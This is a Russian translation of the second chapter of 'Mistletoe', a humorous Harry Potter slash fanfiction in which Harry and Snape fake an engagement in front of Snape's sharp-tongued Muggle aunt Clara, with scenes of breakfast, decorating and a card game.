Mistletoe (Омела)

Автор: Forever then some
Перевод: Kirrsten
Бета: Laconic
Пейринг: ГП/СС
Категория: Слэш
Рейтинг: R
Жанр: Humor/Romance
Статус         закончен.
Disclaimer:  Эта история написана только для развлечения, а ни как не для получения прибыли.
Разрешение на перевод:  получено.
Оригинал: здесь

Глава 2

БУМ! БУМ! БУМ!

Их разбудил стук трости, колотящейся о тяжелую деревянную дверь.

– Мальчики, вы проснулись? Утро наступило, вам это известно?

Гарри застонал и с трудом перекатился на спину – за ночь, проведенную на жестком полу, все мускулы затекли – а потом с головой залез под одеяло.

– Мальчики?..

Гарри застонал ещё громче и повернулся к лежавшей на кровати куче, являющейся Северусом:

– Боги, для её возраста она слишком громогласна. 

– Я все слышу! Что вы там бормочете про мой возраст?

– Лучше не отвечай, – посоветовал Северус, приподнимаясь на кровати. Выглядел профессор измученным – выспаться ему, конечно же, не удалось. Главным образом потому, что он всю ночь вынужден был слушать легкое дыхание Гарри, спящего всего в трех футах от него. Северус медленно провел рукой по своим густым черным волосам и проорал

Мы скоро спустимся, тетя Клара.

– Так я и поверила. Вставайте сейчас же! Я вхожу.

Увидев на полу свитое Поттером гнездо из одеял, Северус испытал небольшое замешательство – предполагалось, что тот должен был спать на кровати.

Медная ручка на двери спальни начала поворачиваться. Одним рывком Снейп свесился через край и, выдернув из-под Гарри  подушку и одеяла, перебросил их на другую сторону кровати, подальше с глаз.

Гарри, тихонько вскрикнув, растянулся на голом полу в тот самый момент, когда дверь открылась, и, вслед за тростью, показалась Клара.

Он не выказала особого удивления, царственно рассматривая открывшуюся перед ней занимательную картину сквозь сидящие на носу очки:

– Странно... Что мальчик делает на полу, Северус?

– Гарри?.. Он... с утра любит делать оздоровительную гимнастику. 

– Ммм?.. О, да, – Гарри неловко выгнул спину и сделал пару быстрых движений.

И Северусу ничего другого не оставалось, как только смотреть, как рубашка, одолженная им вчера Гарри, задирается, открывая дюйм или два плоского загорелого живота.

Он приложил все усилия, чтобы выражение его лица хоть немного напоминало брезгливую снисходительность.

– Как видишь, мы действительно встали. Поэтому, если не возражаешь, подожди нас внизу.  

Клара, медленно поворачивая голову и с интересом разглядывая обстановку, беспечно проигнорировала указание племянника.

– Боже мой, я вижу, что вкусы Гарри совершенно не отразились на обстановке твоего дома, Северус. В твоей спальне нет ни одной вещи, принадлежащей ему. Если не ошибаюсь, даже одежда на нем – твоя. Цвета и те – твои любимые: черный и зеленый. Даже его глаза! Тебе очень повезло, Северус. Теперь понятно, что тебя привлекло в Гарри с первого взгляда.

Снейп пораженно уставился вниз, на Поттера. Он никогда не замечал, какого цвета глаза гриффиндорца. Пришлось признать, что тетя права. Яркий изумрудный цвет был его любимым. Раньше он думал, что глаза у Гарри, как и у Джеймса, карие... И только когда рассматриваемые глаза удивленно моргнули, до Северуса дошло, что он разглядывает их слишком пристально.

Пришлось откашляться:

– Да, весьма счастливое совпадение.

– Ладно, не стоит проводить весь день в постели. Я вполне готова позавтракать.

– Мы скоро будем, – выдавил неестественную улыбку Северус.

– Фффф, – Клара недоверчиво покосилась на них. – Ну-ну, посмотрим...

Гарри подождал, пока тетушка выйдет, и повернулся к Снейпу:

– Она так странно это сказала... Что, по её мнению, мы можем делать в постели целый день? Что такого мы… О! – В голове Гарри тут же возникло несколько различных сценариев того, чем они могли бы заняться в постели, будь они помолвлены.

– Поттер! – Северус  щелкнул пальцами перед окаменевшим лицом.

– Что?

– Я спросил, кто первым займет ванную: ты или я?

– Прости, я немного... задумался. – Заметив ехидную ухмылку на лице зельевара, Гарри возмутился: – Я действительно думаю время от времени.

– Разумеется, – ответил Снейп с большим сомнением в голосе. – Разумеется, думаешь.

– О, иди ты, Снейп... в ванную первым! Даю тебе честное слово, что не буду штурмовать дверь, с целью заполучить мумифицированное, но столь сексуальное тело, скрытое под этими эротическими одеждами.

Прошлым вечером, Гарри упомянул, что немало знает о Северусе, и это знание включало и информацию о том, как можно использовать уязвимые места зельевара. Северус был очень умен, хитер и сведущ в Зельях и Темной магии, но что касается внешности, он так и остался  застенчивым, неуверенным в себе подростком, с большим носом, бледной, желтоватой кожей, угловатой фигурой и жирными волосами. Гарри не чувствовал себя настолько плохо, чтобы воспользоваться этой слабостью сейчас и наблюдая, как внутреннее глухое раздражение Северуса пробивается даже сквозь ледяной фасад, испытал  небольшой укол совести.

Северус утопал в маленькую ванную; где, сердито сжимая зубную щетку в одной руке и пустой стакан в другой, начал внимательно сверлить посудину глазами.

Сидя на краю кровати в ожидании своей очереди, Гарри краем глаза наблюдал, как стакан, который Снейп  держал на уровне лица, начал заполняться водой, поднимающейся со дна небольшим водоворотиком.

– Как ты это сделал?

– Что?..

– Воду, – ответил Гарри, вставая и направляясь к ванной. Подойдя поближе, он запихнул палец в стакан – вода была настоящей: мокрой и холодной. 

Северус, отбирая стакан, выдал ему рассерженный взгляд:

– Прошу прощения. Я собирался её выпить. 

– Скажи, как ты это сделал, – нетерпеливо потребовал Гарри.

Северус почти ожидал, что Поттер сейчас скрестит руки на груди и начнет топать ногами, подобно капризному ребенку. Гарри его ожиданий не оправдал.

– Простая трансфигурация.

– Стакан был пуст. Трансфигурация предполагает преобразование одной субстанции в другую. А ты создал воду из воздуха!

– Ты сам себе противоречишь! Ты только что признал, что я превратил воздух в воду, что, по твоему собственному определению,  уже является преобразованием, – Северус снисходительно ухмыльнулся.

 

Гарри очень хотелось, чтобы наш герой не был так умен.

 

– Почему меня никогда не учили этому?

– Для студента такая магия слишком сложна.

Молодой человек усмехнулся:

– Выходит, я был готов для войны, но не для высшей магии?

– Хммм, я бы очень огорчился, если бы оказалось, что Темного Лорда можно было победить ударом стакана с водой по голове, а мы тебя этому не научили...

– Что ты ещё умеешь получать из воздуха?

– Вода – самое легкое, потому что она уже присутствует в воздухе. Заклинание просто соединяет молекулы воды. Но, при хорошей  практике... и врожденном таланте, ты сможешь  сотворить что-нибудь еще, что состоит из соответствующих элементов, содержащихся  в воздухе.

Гарри взял стакан и вылил содержимое в раковину:

– Сделай это снова.

Северус закатил глаза, но выполнил просьбу, наполнив стакан. Гарри снова вылил всю воду:

– Научи меня.

– Гарри, у нас нет времени...

– Научи!

Вздохнув, Северус накрыл руку Гарри, лежащую на стакане, фиксируя сосуд между ними, а затем произнес необходимое  заклинание,  между делом объясняя настойчивому гриффиндорцу, что тот обязательно должен почувствовать, как магия течет в воздухе, вытягивая из него воду. Это заняло несколько минут, затем прозрачная жидкость начала заполнять емкость. Северус наблюдал за Поттером поверх стакана – выражение лица молодого человека не поддавалось определению. Он лишь отметил, как дернулся нос Гарри.

 Это пахнет. А у воды нет запаха. 

Северус почувствовал легкий, немного отдающий металлом, резковатый запах:

– Не думаю, что получилась чистая вода. Азотная кислота, возможно. Говорил же, что это высшая магия!

Гарри пришлось согласиться: в воздухе, и правда, много азота.

Северус положил вторую руку на теплую смуглую кисть, направляя и концентрируя магию юноши. Гарри почувствовал, как от места соединения их рук поднимается удивительное легкое покалывание и волной расходится по всему телу; он видел, как губы Снейпа проговаривают заклинание и автоматически копировал все действия. На мгновение он ощутил движение воздуха на коже и жар, исходящий от стоящего рядом мужчины. Но чары внезапно оборвались, потому что вода выплеснулась через край и полилась им на руки.

Снейп отставил стакан и бросил высушивающее заклинание:

– Возможно, я смог бы позаниматься с тобой в более подходящее время.

Гарри кивнул, все еще чувствуя легкое присутствие магии Северуса в воздухе:

– Что ж, это было по-настоящему... горячо! – неожиданно вслух сказал он.

Северус нахмурился:

– Когда тетушки нет рядом, температуру комнаты можно отрегулировать с помощью магии, используя  чары Tempura, и попробовать охладить воздух. Хотя, должен сказать, я не думаю, что здесь так уж жарко. Мне нравится, когда в комнате прохладно... Над чем ты смеешься?

 Наш герой, как оказалось, был не так уж и умен.

 БУМ!

Гарри едва не выпрыгнул из собственной кожи.

– Видимо, это снова тетя, – пробормотал Снейп, твердо уверенный, что никто другой не способен производить столько шума одной тонкой тростью – только Клара Снейп. 

– Вы, двое, готовы, наконец? Я не слышу, чтобы вы собирались!  

Северус и Гарри одновременно вздрогнули и поспешили подготовиться к новому дню.

 Если бы они знали, что их ждет, то, скорей всего,

предпочли бы

заползти обратно под одеяла  и  переждать грядущее.

 Северус, прежде чем опуститься на стул, принесенный из гостиной-библиотеки-кабинета, обогнул кухонный стол и запечатлел на щеке Клары целомудренный поцелуй. На кухне осталось всего два целых стула, и, конечно, потребовалась бы всего одна секунда, чтобы восстановить пару сломанных с помощью магии, но было бы весьма сложно объяснить тете Кларе, когда и как их починили.

Северус расправил на коленях салфетку:

– Надеюсь, сегодня вы хорошо себя чувствуете, мадам?

– Каждой клеточкой тела, как и положено пятидесятидевятилетней женщине.

– Ну, не так уж плохо... – непринужденно заметил Северус. – Особенно, когда мы оба знаем, что тебе шестьдесят девять.

– Фффф, дерзкий мальчишка!

– Доброе утро, – к ним присоединился Гарри. Он переоделся и теперь щеголял в футболке медного цвета и потертых джинсах. Северус не сомневался, что мальчишка занялся трансфигурацией его вещей. 

– Доброе утро, Гарри, – Клара устремила на молодого человека пристальный ястребиный взгляд. – Какие у вас планы на сегодня?

Гарри скользнул на свободный стул и оглянулся на Северуса:

– Э-э-э… Никаких, наверное. 

– Отлично. Самое время  украсить  дом к празднику, как считаете?

– Я не желаю, чтобы мой дом засоряли идиотскими  праздничными гирляндами, – перебил ее Северус.

– Теперь это также и Гаррин дом, Северус, а он, возможно, хочет его украсить. Гарри?

– В этом вопросе он согласен со мной, не так ли, Гарри?

Но Гарри мудро набил рот сдобой, чтобы избежать ответа на вопрос, и упорно не замечал, что оба представителя семьи Снейпов выжидательно уставились на него.  

– Само совершенство, – ласково пропела Клара.

Племянник пожал плечами, уставившись на Поттера, который упрямо пробовал прожевать то, что, как подозревал Северус, являлось половиной булочки.

– Это заставит его ненадолго замолчать, – заметил Снейп. – Когда он молчит, то не так раздражает.

Гарри быстро прожевал и проглотил остатки булочки:

– Я никогда не бываю раздражающим.

Северус уставился на него, демонстративно приподняв бровь.

– Ну, ладно, я давно уже никого не раздражаю.

Бровь поднялась ещё выше.

– Не сегодня?.. – обреченно попробовал несчастный ещё раз.

Вторая бровь приподнялась и присоединилась к первой. Их хозяин продолжал тихо сверлить Гарри глазами.

– Прекрасно! С того момента, как начался завтрак!

– Ближе к истине, – согласился Северус и легко избежал удара ногой под столом. Иногда мальчик так предсказуем…

– Итак, как долго мне придется ждать, прежде чем я получу внука или внучку?

...в отличие от его тетки!

Гарри поперхнулся апельсиновым соком, залив колени и обеденный стол. Когда Снейп увидел, как он автоматически потянулся за палочкой, чтобы привести все в порядок, то перехватил его руку и запихнул в неё салфетку, сопровождая это действие пристальным взглядом. Гарри тихо забормотал что-то о том, как неудобно обходиться без помощи магии.

– Ох, дорогой, – без тени раскаяния, извинилась Клара. – Я не подумала, что ты можешь так удивится. Как мне кажется, в наши дни гей-пары часто усыновляют детей или, например, находят суррогатную мать. Ты же хотел бы иметь детей, а, Гарри?

– Детей? – глухим эхом отозвался Поттер.

– Детей, – нетерпеливо подтвердила Клара. – Ты ведь, на самом деле, хочешь этого? Единственное, о чем я сожалею всю жизнь, что у меня нет детей, и всегда боялась, что Северус совершит ту же самую ошибку. Даже сказать не могу, какое облегчение я  испытала, узнав, что он собирается завести семью! Я думала, что мой непутевый брат навсегда отвратит его от этой мысли. Всегда…

– Тетя Клара, –  раздался предупреждающий голос Северуса, руки которого нервно скручивали в узел салфетку. – Достаточно. Есть более приятные темы для разговора. 

– Конечно, дорогой. Прошу прощения.

Гарри никогда бы не поверил, но железная леди выглядела почти раскаивающейся. Одно короткое мгновение.

– Итак, Гарри, милый, ты не ответил на мой вопрос... 

– Тьфу... – повисла неловкая пауза. – Я люблю детей... более-менее. С подходящим человеком, да, пожалуй, я готов завести детей. 

Сознание Северуса моментально зацепилось за эту фразу. С подходящим человеком… Он вспомнил о рыжеволосой Уизли, с которой помолвлен Поттер. Они собираются пожениться?.. Гарри хотел бы завести с ней детей?

В голове царил хаос. Гарри, привязанный к месту, подобному Норе... Гарри, с целым выводком потомства рыжих Уизли, орущим и кружащим вокруг него.

От этой мысли скрутило живот. Гарри достоин большего.

Не обращая внимания на взволнованного племянника, Клара кивнула.

– Замечательно. Сколько?

– Сколько... чего? – повторил Гарри, как попугай. Он мог бы поклясться, что его сердце бьется уже где-то в горле.

Дети, Гарри. Скольких детей ты хотел бы? – Клара повернулась к Северусу и тихо пробормотала: – Мальчик мне очень нравится, Северус, но мне кажется, он немного непонятлив, нет?

Прекрасно расслышав сказанное, Поттер покраснел. 

– Мммм, двоих было бы достаточно. По-одному каждого пола.

– Двоих? Хммм, – Клара приподнялась и потянулась за следующей булочкой, затем уселась на место и ласково продолжила: – Я думала о четверых.

– Четверо?! – задохнулся Поттер, забыв на мгновение, что все это просто фарс. Он представил дом, полный маленьких Снейпов, одетых в черное и  с соответствующими ухмылками на лицах. Весьма устрашающая картина… Хотя, не слишком неприятная. Эта неожиданная мысль заставила его запнуться.

Клара быстро кивнула:

– Четверо. Для начала. Если честно, я просто поражена, что вы не обсуждали этот вопрос прежде. Подобные вещи должны оговариваться перед свадьбой. Если один из вас хочет двух детей, а сердце другого поет о четырех…

– Единственный, кто здесь поет о четырех – ты, – не выдержав, рявкнул Северус. – Но поскольку не ты выходишь замуж за одного из нас – это бессмысленный разговор.

– Пффф, я настаиваю: если одну из малышек вы решите назвать Кларой, она должна быть самой умной из всех.  

Тук! Тук! Тук!

Все трое на мгновение застыли, напрягая слух и пытаясь понять, откуда раздается странный звук.

Тук! Тук! Тук!

– Это что там, птица за окном?

Северус и Гарри, сообразив, что это может быть одна из почтовых сов, немедленно ответили:

– Нет!

– Что бы вы не говорили, я ясно вижу за окном птицу!  Похожую на сову. О, Северус, ведь это не дурной знак? Кажется, она собирается выбить стекло.

Гарри повернулся на стуле и узнал в нетерпеливо стучащей в окно птице свою белую сову. Он попробовал незаметно подать Хедвиг знак – качая головой из стороны в сторону как нервно-больной и намекая, чтобы она убралась с подоконника.

– Уверен, это вовсе не птица, – быстро сказал он.

– Действительно, с какой стати птице делать что-то подобное? – одновременно выпалил Северус.

– Вы двое просто ослепли! Вот же она, на этом окне!

– Ах, на этом! – удивился Гарри.

Раздался мягкий щелчок, и жалюзи на окне скользнули вниз, словно поддерживающий их механизм внезапно сломался.

– О! Ну вот, –  спокойно сказал Северус. – Уверен, она уже улетела.

Тук! Тук!

БУМ! БУМ! БУМ!

Гарри вздрогнул – то, что они закрыли жалюзи, делу не поможет: старушка Хедвиг так легко не сдастся.

– Наверное, мне лучше сходить посмотреть, – предложил Гарри, стремительно выскакивая из-за стола.

– Вернись, – приказала Клара. – Если с этой птицей что-то не так, она может тебя поранить.

Гарри неохотно сел.

– А сейчас, Северус, иди и проверь, что там происходит с бедной пташкой.

– Ты только что приказала сесть...

– Кхм, ты-то сможешь о себе позаботиться.

– Так и Гарри может, – проскрежетал Снейп сквозь зубы.

БУМ! БУМ!! БУМ!!!

– Почему бы нам не пойти вместе? – предложил Гарри под убийственным взглядом Снейпа.

– Отлично, но поторопитесь, пока она не покалечилась.

– О Боже, не допусти, чтобы эта проклятая птичка пострадала, – Северус поднялся и ворча направился к черному ходу. 

Почти сразу оттуда донеслись пронзительный клекот, проклятия, а затем дикие ответные крики.

Гарри, тщательно скрывая расползающуюся кривую улыбку, торопливо бросился догонять Снейпа, справедливо полагая, что Хедвиг и Северус лучшими друзьями не станут. Слишком уж характеры схожи...

Когда белоснежная сова увидела Гарри, то быстро спикировала вниз, приземляясь ему на плечо, затем, покрутив головой, впилась немигающим взглядом в Северуса. Гарри отвязал от её лапки письма – одно от Джинни, другое от Рона и Гермионы – и победно помахал ими в направлении Северуса:

– Я отправил вчера вечером Рону сообщение, что немного опоздаю, но все равно обязательно приеду на Рождество, – он ласково  погладил Хедвиг по оперению: – Для неё найдется место? 

Снейп мрачно указал на маленькое круглое окошко, ведущее на чердак:

– Там.

Гарри кивнул, шепотом обещая упертой птичке целую пригоршню лакомства, если она будет вести себя тихо и незаметно следующие несколько дней. Хедвиг протестующе заклекотала и улетела. Гарри запихал письма в карман, и Северус кивком велел ему возвращаться на кухню.

– Ну и что там такое произошло? – потребовала отчета тетя Клара.

– Птичка улетела, – решительно отрезал Северус и выдохнул в сторону Гарри: – Мерзавка вела себя прямо как голубка.

– Что? – вскинулась Клара. – Повтори!

Северус лишь приподнял бровь. Тетушка, когда ей это было выгодно, любила симулировать глухоту. А выгодно было всякий раз, когда беседа уходила в сторону и о ней забывали.

– Я говорю, – Северус пристально смотрел на Клару, – что Гарри сегодня утром выглядит особенно привлекательным.

Критический оценивающий взгляд вперился в покрасневшего Гарри.

– О, да. Что заставляет меня задумываться о том, как мальчик кончает с тобой...

Гарри издал задушенный хрип. Одно дело, когда  он оскорбляет Северуса, но когда себя настолько бесцеремонно ведет эта женщина – это... неосмотрительно.

– Пожалуй, тебе стоило бы вести себя более тактично, если хочешь остаться в этом доме, – мягко предупредил Северус.

– Я просто высказала свое мнение, – начала оправдываться Клара. – Привилегия, даруемая возрастом. Ты оценишь подобную свободу, когда постареешь. 

– Представь себе, я оценил, – сухо отрезал Снейп. – И уже давно.

– Пф-ф... Знаю. Вероятно, поэтому ты так долго и оставался одиноким.

– А мне кажется, что Северус очень красив, – выпалил Гарри.

Парочка весьма странно посмотрела на него.

– Ну, я… вы сказали… Я это… вот…

Клара повернулась к Северусу:

– Как по-твоему, что это значит?

– Я полагаю, – Северус выдал весьма специфическую ухмылку, – он пытается  защитить мою честь, после того, как ты ранила мою нежную душу подобным оскорблением. 

– Как странно. 

– Справедливости ради – он просто не осведомлен о твоей несклонности к нежностям.

Клара смущенно рассмеялась, и даже Северус издал что-то похожее на хихиканье.

Гарри скрестил руки на груди и уставился на них:

– Я  просто хотел сделать тебе что-то приятное. И если ты не умеешь быть благодарным, попробуй хотя бы быть менее неблагодарным.

Клара продолжала хихикать:

– Северус, дорогой, кажется, твой мальчик собирается обидеться. 

– Мммм,  самая непривлекательная привычка, особенно, когда его что-то не устраивает.

Гарри усмехнулся:

– Я не собираюсь о... – и резко оборвал себя; уголки его губ немного приподнялись. К чему сердиться, если есть другой способ достать Снейпа? Он облокотился на стол, прикусывая нижнюю полную губу, медленно скользя по ней зубами, и выдал Снейпу бесхитростный затуманенный взгляд: – Тешу себя надеждой, что эту гадкую привычку наши дети не унаследуют, любимый, – и усмехнулся, наблюдая, как к бледным щекам Северуса приливает кровь. – А сейчас, если вы не против, я хотел бы подняться на чердак и поискать какие-нибудь украшения к Рождеству. Все-таки Клара права – нам понадобится много, много игрушек. 

 Задержись Гарри еще на минуту, и Северус не гарантировал бы, что тот доживет до Рождества.

Немного позже, Снейп устало забрался по лестнице на чердак и нашел мирно читающего ранее полученные письма Гарри в гнезде из зеленых гирлянд, окруженного кучей ярких, красных Рождественских безделушек.

– Вижу, ты нашел кое-какие игрушки. 

– Угу, – кивнул Поттер куда-то в сторону совы. – Хедвиг принесла мне  веточки и круглые камешки с обочины, а я их трансфигурировал. Теперь осталась только елка.

– Гарри! Северус! – донесся снизу голос тети Клары. – А ну-ка несите все вниз. Мигом!

Северус вздохнул:

– Сейчас.

Отметив отсутствующий взгляд Гарри, держащего в руке письмо и неосознанно водящего кончиками пальцев по аккуратно выведенному на обороте имени, Северус сердито произнес:

– Надеюсь, ты не позволишь ей себя отвлекать. Ты должен сосредоточится на нашей комедии.

Гарри нахмурил брови и повернулся к входу, задаваясь вопросом, как и от чего тетушка может отвлечь его? Она сама – настоящая комедия.

– Я не дам ей сбить себя с толку… 

 Необходимо отметить, что во время дальнейшей беседы,

Гарри и Северус говорят не об одном и том же  человеке.

Ничего похожего. Даже близко.

 – Конечно, тогда почему ты выглядишь столь...  отсутствующим?

– Я похоже начинаю её любить, – ответил Гарри, нежно улыбаясь. Это было на самом деле так: чем больше времени Гарри проводил с тетей Кларой, тем больше восхищался её острым умом и резким остроумием. Выбор прилагательных его развеселил. Острый и резкий – ничего спокойного или мягкого для этой дамы.

При виде нежной усмешки, играющей на губах Гарри, Северус почувствовал, как в животе холодеет.

– Действительно, – Гарри продолжал развивать свою мысль, – я подумал, что было бы приятно быть с ней одной семьей...  даже если бы пришлось для этого жениться.

Северус умудрился сохранить видимость равнодушия. Все очень серьезно, раз Гарри подумывает о свадьбе с девчонкой...

Ледяные колючки мучительно терзали желудок.

 Чувство это было Северусу совершенно незнакомо.

Безусловно, это была самая настоящая ревность.

Но ревновать к мелкой Уизли, которая на двадцать два года моложе его?!

Совершенно невозможно.

 – Просто... не наделай глупостей.

Гарри прищурил глаза:

– Например?

– Например, не стоит остепеняться слишком быстро. В конце концов, у тебя решительно нет опыта в таких делах. До сегодняшнего дня твоя жизнь была наполнена совершенно другими событиями.

– Считаешь, я действую слишком напористо? – Гарри выглядел немного испуганным – он никогда не имел дел с женщинами, похожими на Клару. Его самый большой опыт в подобных делах – отеческая забота Дамблдора. И он действительно чувствовал странную привязанность к тете Северуса, несмотря на то, что они с ней едва знакомы. Мерлин, оставалось надеяться, что он не слишком давил с установлением дружеских связей и не поставил Клару в неловкое положение.

– Ладно, я и понятия не имею, какие у вас отношения, – обиженно буркнул Северус.

– А на что это похоже? – подтолкнул Гарри.

Северус задумался о том, что он видел. Откровенно говоря, утверждать, что Гарри  торопит события, было нельзя. В конце концов, Северус никогда лично не видел, чтобы  эти двое позволяли себе нечто-то большее, чем просто держаться за руки или танцевать, когда Гарри появлялся с ней на людях. Даже на страницах магических газет ни разу не появилось  компрометирующих парочку фотографий (не то, чтобы он их рассматривал!), хотя истории об их отношениях и слухи о встречах и размолвках упоминались часто, иногда в одном и том же выпуске. Пришлось признать:

– Ладно, я не заметил ничего предосудительного.

– Хорошо, потому что я действительно хочу понравиться ей. Приятно знать, что хоть кто-то не видит во мне Мальчика-который-выжил. 

 

Он не воспринимает Гарри, как Мальчика-который-выжил!

 – Уверен, она не относится к тебе, как к живой легенде...  

Поскольку Клара была магглой, то, естественно, что она никогда не слышала о его подвигах, и Гарри уверенно произнес:

– Конечно, она не думает обо мне как о Мальчике-который-выжил!

– Надеюсь, что нет.

– Я тоже.

Северуса немного смутил странный тон Гарри. Возможно, мальчик расстроен, потому что предпочел бы быть сейчас с Уизли, а не  прятаться на чердаке от его тетки, довольствуясь чтением письма. Снейп кивнул в сторону бумаги, зажатой в пальцах Гарри, и с раздражением предложил:

– Я отнесу украшения тете. А ты можешь остаться здесь и написать ей письмо.

– Ты считаешь, что мне нужно написать ей? – переспросил несколько озадаченный Гарри – ведь тетя Клара находится на расстоянии всего тридцати футов, включая лестничный пролет?..

– Хорошие манеры подразумевают, что ты должен  поведать ей о своих чувствах. 

– Правда?.. Ну, я думаю... предположим... может, у меня и получится. Мм... И что я должен написать? 

Северус закатил глаза:

– Поттер, ты – взрослый человек! И, наверняка, не нуждаешься в том, чтобы кто-то водил твоей рукой по бумаге.

И получил в ответ холодный взгляд:

– Никогда прежде не писал ничего подобного. И, безусловно, ничему такому меня в Хогвартсе не учили.

Тяжко вздохнув, Снейп начал:

– Все, как обычно. Что-нибудь скучное о своей жизни, сдобренное парой шутливых замечаний. Попробуй подать все кратко и четко, но не слишком сухо. И затем расскажи ей о своих переживаниях.

– Мне все ещё кажется странным – писать ей. 

– Почему?

– Я же постоянно сталкиваюсь с ней лицом к лицу.

– Как хочешь. Но я уверен,  ей было бы приятно получить от тебя письмецо. 

– Ну, хорошо, если ты настаиваешь.

Северус кивнул, сложил украшения в коробку и вышел на лестницу:

– Тогда я оставляю тебя.

Гарри неторопливо потягивал чай, наблюдая за Северусом, пытающимся развесить украшения в соответствии с требованиями тети Клары. Пока это выглядело как старательное перетаскивание вещей с одного места на другое, когда руководящая сложным предпраздничным процессом тетя Клара решала, что какая-то часть расположена не там, где требует ее взыскательный вкус. Они занимались этим практически весь день, и Гарри  пришел к выводу, что ангельское терпение Северуса давно закончилось.

Будь на месте тети какой-нибудь другой смельчак, решившийся помучить Снейпа таким вот садистским способом, его бы давно уже прокляли. А так Гарри чувствовал, что женщине не причинят вреда. Во всяком случае, пока она не заявила:

– Что касается вон той гирлянды…

Гарри вздрогнул, наблюдая, как напряглась вена на шее Северуса. Потом старший маг медленно повернулся к женщине и зашипел: – Я перевешивал эту дрянь пять проклятых раз, и все без ма… волшебства.

– Без чего, дорогой?

– Без чьей-либо помощи, – рыкнул Северус, пристально глядя на Гарри и явно намекая на что-то...

Тот  ласково улыбнулся:

– Я помогаю твоей тете.

– Ты сидишь на заднице и пьешь чай – вот и все.

– Северус! Придержи-ка язык!

– За последние десять минут, ты выдала ругательства и похуже, милая тетушка. 

– Ну? Чего ты ждешь? – Клара стукнула тростью по полу.

– Проклятье! – выдохнул Северус.

– Э-э-э? Повтори!

Гарри же расслышал Северуса отлично и попытался сдержать смех, прикрывая рот рукой и усиленно симулируя кашель.

– Северус, немедленно! – пролаяла Клара, размахивая тростью в опасной близости от ног племянника. –  Та гирлянда, сама, по мановению волшебной палочки не повесится! 

Приглушенный смех Гарри превратился в припадок жуткого удушья, и молодой человек согнулся пополам, едва не падая со стула.

Сначала Северус окинул его равнодушным взглядом, затем с возрастающим волнением, поскольку кашель не прекращался, а лицо гриффиндорца начало краснеть от недостатка кислорода.

– Тебе что-то попало в горло? – заботливо  прокричала Клара.

– Надеюсь, что нет... У него во рту, вроде, ничего не было.

– Стукни его по спине! – решительно предложила Клара. – Да посильней!

Кашель Гарри стал просто ужасающим. Не выдержав, молодой человек всхлипнул, сорвался с места и убежал на кухню.

– Ну? И чего ты ждешь? Иди и посмотри, все ли с ним в порядке! – приказала старуха. – И не забудь побить его!

Северус послушался. В конце концов, побить Поттера было бы... забавно.

Когда дверь за его спиной закрылась, Северус бросил заглушающее заклинание и устремил на Гарри строгий профессорский  взгляд:

– Придите наконец в себя, Поттер.

Гарри, обхватив себя за живот и сгибаясь, опять зашелся в приступе смеха. Северус лишь фыркнул, терпеливо ожидая, когда тот успокоится.

Минуту спустя смех перешел в слабое хихиканье, затем Гарри успокоился, с жалостью поглядывая на Северуса:

– Знаешь, в чем твоя проблема?

– Естественно. Она сейчас прямо передо мной, – ответил Снейп, многозначительно глядя ему прямо в глаза.

– Твоя проблема в том, – Гарри проигнорировал завуалированное  оскорбление, – что ты никогда не смеешься.

– Ха! Не тебе решать, что мне делать, а что нет. Возможно, я просто не вижу причины хохотать в твоей компании.

– Нет, – уверенно перебил Гарри. – Ты просто не привык смеяться.

– И что заставило тебя прийти к такому выводу?

– Ты всегда выглядишь немного шокированным, когда собираешься засмеяться, будто не веришь, что можешь быть счастлив.

– Я… «Неправда – Замолчав, Северус выскочил из кухни.

Остаток вечера он не мог избавиться от преследовавшего его запаха мыла Гарри, а, возможно, это было то самое тревожащее чувство, что возникло, когда их руки соприкоснулись утром...

 Или, быть может, ничего вообще не было, и причина заключалась лишь  в нем самом.

 Вечером тетя Клара настояла на том, чтобы они все вместе уселись у камина, рядом с маленькой елкой и с зажженной на ней гирляндой, и  сыграли в карты. Гарри думал, что это будет обыкновенная спокойная семейная игра, но на деле все оказалось завуалированной, нечестной демонстрацией  соперничества.

Первые несколько партий Гарри чувствовал себя слегка потерянно, а представители дружной семейки, абсолютно не смущаясь, указывали ему на нарушения правил, о которых он никогда даже и не слышал, и количество монеток в его кучке стремительно убывало. Стоит добавить, что ни одного из присутствующих Снейпов назвать великодушным победителем было нельзя. С двух сторон на Гарри сыпались ядовитые замечания и самодовольные улыбки, перемежаемые  недоверчивыми, косыми  взглядами родственничков друг на друга.

Но это не помешало Гарри весьма быстро усвоить неписанные суровые правила игры, а именно: нет никаких правил, пока ты не пойман.

– Ты жульничаешь! – через какое-то время уверенно заявил Северус, после того, как Гарри сбросил на стол карты, победив десятый раз подряд. – Поверить не могу, что ты ради денег обманываешь мою тетю! 

– Это не так! – Возмущение даже не пахло искренностью – положа руку на сердце, Гарри жульничал. Но он пользовался магией только против Северуса – Клара с успехом проигрывала сама по себе, что и сделало Гарри безоговорочным победителем. В свое оправдание он мог бы заметить, что не является единственным жуликом за этим столом. Он несколько раз замечал, как Клара прячет карту-другую под стол, и, намного раньше, чем сам додумался до этого, почувствовал едва уловимое  покалывание магии, смешивающей карты: – Как ты мог подумать, что я посмею обмануть эту милую старую даму?!

– Милую? – усмехнулся Северус.

– Старую? – задохнулась Клара.

– Пусть, милая не в обычном смысле слова… –  промычал Гарри, обратив внимание на изумленный тон Снейпа, затем повернулся к Кларе: – Что вы! Вы не старая,  я просто имел в виду… ммм…  высокое положение, которое вы занимаете ввиду того, что вы…

– Старая? – влез Северус.

– Гарри. Прекрати, – Клара махнула тростью в сторону его голени. – Мне кажется, ты дорожишь своими ступнями.

– Хммм, возможно, мне уже пора спать.

– Понятливый мальчик, – одобрительно кивнула милая старушка.

Гарри улыбнулся и поднялся с дивана:

– Увидимся утром, Клара. Спокойной ночи. – Он повернулся и минуту пристально смотрел на Северуса: – Увидимся, когда ты... э-э-э... придешь ложиться.

Северус, скользнув по нему безразличным взглядом, быстро кивнул:

– Я скоро буду.

Снейпы молча слушали, как Гарри поднимается по лестнице, затем, с мягким щелчком, закрылась дверь в спальню. Молчание длилось недолго: Клара повернулась к племяннику и одарила его критическим взглядом ясных  янтарных глаз:

– Ты не очень-то с ним нежен, не так ли? – Северус сердито посмотрел на неё. – Я здесь уже целых два дня и ни разу не видела, что бы ты держал его за руку или прикасался к нему. Что у вас за отношения?

– Мы не стремимся выставлять свои чувства напоказ. Это – личное, и совсем не отражает наши истинные отношения.

– Тебе ничего не стоит выразить свои чувства немного яснее. Уверена, Гарри бы понравилось. Ты слишком тяжелый и сложный человек, чтобы он смог догадаться обо всем сам.  

